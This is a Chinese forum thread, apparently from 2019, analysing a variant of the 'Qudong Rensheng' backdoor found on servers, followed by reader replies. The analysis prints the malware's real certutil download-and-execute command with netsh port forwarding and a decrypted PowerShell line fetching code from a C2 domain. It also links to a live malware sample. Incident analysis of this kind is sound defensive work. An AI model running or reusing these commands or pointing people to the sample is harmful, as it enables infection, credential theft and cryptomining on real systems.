“驱动人生”后门变种
本帖最后由 616804390 于 2019-6-10 20:57 编辑在近期排查几台服务器的过程中,发现了“驱动人生”后门变种,从木马中提取的相关域名和ip如下:
v.beahh.com/o.beahh.com/new.beahh.com/cert.beahh.com/loop.hqo.net/w.beahh.com
C&C端ip: 172.104.73.9/172.104.78.101/153.92.4.49
病毒MD5:96bdb44e072122ee05fb8e729063463c
病毒名称svchost.exe
该木马运行后会释放一个m.ps1 PowerShell运行程序,此程序会调用Mimikatz脚本,进行本机用户和密码的抓取, 同时创建计划任务,每天7点自动向w.beahh.com发送http请求下载域名解析后服务器上的程序,并以HTA(内含微软某CVE漏洞的payload)运行方式执行的命令。
该木马会发送基于445端口的SMB数据包,同时具有扫描内网和外网开放445端口的ip,即便已安装永恒之蓝的补丁,也无法遏制内网传播,一旦开启了SMB服务则有可能会中毒,该木马是利用445端口进行SMB域账户爆破,该病毒实施的SMB爆破行为,是基于SMBV2协议的一种攻击方式,且木马中内置弱口令账户和密码,同通过IPC$空连接进行SMB服务的账户爆破或登陆。
该病毒获取到用户名或密码时,无论是爆破还是抓取到的用户名密码,通过IPC$登陆后,对中病毒机器执行以下命令进行远程下载执行,同时设置端口转发,将来自65532端口的流量转发到1.1.1.1地址的53端口,将来自65531端口的流量转发到1.1.1.1地址的53端口。
cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
病毒同时也会创建可写文件update.exe文件。
分析update.exe如下:
该文件中发送指令通过RSA算法进行加密, 获取指令后通过编码RSA公钥进行解密,最终执行远程命令。
文件中对I am the mxr report进行互斥体判断,打开互斥体,即mxr(门罗币挖矿)程序。
病毒拥有远控功能,运行后将本机的CUP型号,操作系统版本,MAC地址,ip地址,域用户名,显卡信息,挖矿线程,以及计算机参数传递给终端:
该脚本新增一个计划任务,计划每天7:00运行C:\windows\temp\svchost.exe程序,同时向域名端发送远程下载执行命令,加密内容解密后为:
(NewObjectNet.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)
病毒拥有识别以下游戏进程功能:
crossfire.exe|war3.exe|metor.exe|KartRider.exe|ra2.exe|wow.exe|wow64.exe|xy3launch.exe|cstrike.exe|gtavc.exe|crossfire.exe|MIR2.exe|mir3.exe|JX3Client.exe|cstrikeonline.exe|qqfo.exe|DNFchina.exe|xypqlayer.exe|palonline.exe|digimon.exe|DNF.exe|FF2Client.exe|LolClient.exe|KartRider.exe|dota.exe|dota2.exe|TslGame.exe,
病毒具有识别以下杀毒软件的功能:|360tray.exe|360sd.exe|avp.exe|vMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe
在排查的服务器上并未发现病毒有挖矿功能的挖矿行为,由于病毒功能黑客可远程执行,黑客应该是在通过传播广泛后,在肉鸡量足够多时,统一执行,且发现黑客的病毒也在不断更新中。
附病毒样本:链接: https://pan.baidu.com/s/13CJr6Zs7vyytkTISx0xofA 提取码: mp4k 文件大小:7.9M(也是第一次见这么大的马子)
好吧 样本在这里 https://www.52pojie.cn/thread-844695-1-1.html ming_83 发表于 2019-2-28 11:29
这个楼主说话不说全,不说是哪个版本的驱动人生(最新官方版的吗)也不说怎么查杀这个病毒,
查杀的话基本上就是把计划任务啥的删了,进程关了,对应的文件删了就OK了。附专杀,还凑合。会有漏删。结合火绒更方便。
链接: https://pan.baidu.com/s/18oWYtzFsCmMTES-jGMKxNg 提取码: be1v 复制这段内容后打开百度网盘手机App,操作更方便哦 很详细,学习了 学习学习~ .....卧槽..上周刚给新买的笔记本下驱动人生更新驱动{:1_911:}{:1_911:} 已收到通知,谢谢分享。 学习了,谢谢!!!!!!!!! 学习了,谢谢!!!!!!!!! 谢谢分享!! 驱动人生的防护不是很好看来